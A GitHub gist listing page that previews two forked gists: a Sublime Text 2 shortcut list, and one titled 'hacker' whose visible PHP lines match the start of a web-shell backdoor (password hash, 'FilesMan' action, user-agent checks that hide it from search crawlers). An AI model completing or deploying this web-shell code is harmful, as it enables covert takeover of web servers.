Skip to content

Instantly share code, notes, and snippets.

View 91pavan's full-sized avatar

Pavan Sudheendra 91pavan

  • Cisco Systems
View GitHub Profile
@91pavan
91pavan / hacker
Created May 16, 2013 02:35 — forked from anonymous/hacker
<?php
$auth_pass = "63a9f0ea7bb98050796b649e85481845";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
#+Dump Columns ////Boolean
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
@91pavan
91pavan / Sublime Text 2 commands
Created January 6, 2013 18:23 — forked from hileon/gist:1311735
Sublime text 2 commands
h1. Sublime Text 2 - Useful Shortcuts (Windows)
h2. General
| *Ctrl+KB* | toggle side bar |
| *Ctrl+Shift+P* | command prompt |
| *Ctrl+`* | python console |
| *Ctrl+N* | new file |
h2. Editing